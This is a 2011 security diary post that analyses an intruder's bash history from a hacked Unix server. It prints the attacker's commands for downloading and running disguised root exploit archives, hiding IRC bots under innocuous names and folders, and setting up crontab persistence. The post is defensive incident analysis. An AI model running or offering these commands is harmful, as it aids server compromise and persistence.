Anatomy of a Unix breach

Published: 2011-07-31. Last Updated: 2011-08-02 19:42:49 UTC
by Daniel Wesemann (Version: 3)
8 comment(s)


ISC reader Will wrote in to share a bash_history file (thanks!) from one of his Unix servers that got hacked. Since knowing the command sequence used by the bad guys helps to detect similar intrusions, we are sharing it here in (almost) full length. Some of the sites hosting the used root shell exploits are still live, and hence not included. The whole breach of Will's server started via a password guessing attack against SSH. We have covered this risk repeatedly in ISC diaries. Once the bad guys were in, they ran the commands below, and then apparently used the just installed IRC bots to continue scanning for SSH ports on other systems.

Phase#1: The bad guy tries to find out more about the box he just broke into

uname -a

Phase#2: Bad guy downloads all the Linux root exploits that he has, and just run them, hoping for a lucky break. Note how some of the TAR files come with an innocent-looking jpg or pdf extension. Hence, if you are filtering certain file types at the perimeter proxy, you better hope that your proxy goes by MIME type and magic bytes, and not by extension alone!

wget;tar xzvf exploit.jpg;rm -rf exploit.jpg;cd exploit;./mv;id
wget ; tar zxvf ex.tgz ; cd e ; chmod +x * ; ./exploit ; id
wget;tar zxvf 2.6.18.tgz;rm -rf 2.6.18.tgz;cd uid0;./uid
wget;tar zxvf expl.pdf;rm -rf expl.pdf;cd w;./
wget;tar zxvf god.jpg;rm -rf god.jpg;cd .ICE-UNIX;./autorun;./run

We are not quite sure whether any of the above exploits was successful. The "id" command, or the exploit itself, would have told the attacker whether he got lucky, but there aren't any traces in the shell history file that would tell us either way.

In any case .. follows Phase #3a: The attacker installs some goodies. "virus.tar" isn't really a virus, it is a copy of EnergyMech, an IRC bot. Note how the bad guy uses Nano to edit the config file, which tells us that he isn't all that experienced on Unix. A real Unix hacker would most likely use "vi", because vi is present on all Unix flavors and versions. Note also how he calls the IRC bot "Evolution" when he starts it, likely hoping that an admin would overlook it in a casual investigation.

/sbin/ifconfig -a | grep inet
tar xvf virus.tar
rm -rf virus.tar
cd virus
ls -a
nano start
nano inst
chmod +x *
./start Evolution

Phase#3b: Install some more goodies. egg.tgz is a copy of Eggdrop, another IRC bot. Note how the bad guy puts the files into a directory called " " (single space). If you want to search for such directories on your system, try this
#find / -name " " -exec ls -aldQ {} ;

mkdir " "
cd " "
ls -a
cd " "
tar zxvf egg.tgz
rm -rf egg.tgz
cd .access.log
ls -a
chmod +x *
./eggdrop -m bot1.conf
ls -a
cd scripts
nano respond.tcl

Phase #4: The attacker wants to make sure that access can be re-gained, and configures the cron tab to re-start some of his processes automatically on a schedule.

crontab -l
crontab -e




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